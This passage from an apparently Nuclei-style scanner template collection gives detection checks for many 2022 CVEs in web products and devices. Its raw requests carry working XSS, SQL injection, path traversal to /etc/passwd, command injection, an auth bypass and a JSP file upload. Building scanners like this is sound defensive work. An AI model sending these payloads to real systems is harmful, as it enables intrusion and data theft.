\"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp","Total execution time is"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-34094","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28033","info":{"name":"Atom.CMS 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"atomcms\")"],"internal":true}]},{"raw":["@timeout: 20s\nGET /admin/uploads.php?id=sleep(7) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(body, \"WHERE id\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-2174","info":{"name":"microweber 1.2.18 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(body, \"<script>alert(document.domain)</script>\") && contains(body, \"microweber\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45805","info":{"name":"WordPress Paytm Payment Gateway <=2.7.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["p1_network_mail.cgi"]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33174","info":{"name":"Powertek Firmware <3.30.30 - Authorization Bypass","severity":"high"},"requests":[{"raw":["GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36553","info":{"name":"Hytec Inter HWL-2511-SS - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"command":["cat%20/etc/passwd","type%20C://Windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, '<title>index</title>')","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200","contains(body_1, '<title>index</title>')"],"condition":"and"}]}]},{"id":"CVE-2022-48164","info":{"name":"Wavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WN533A8\")"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Login=\", \"Password=\", \"WiFi_\", \"WAVLINK\")","contains(content_type, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://oast.me/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET 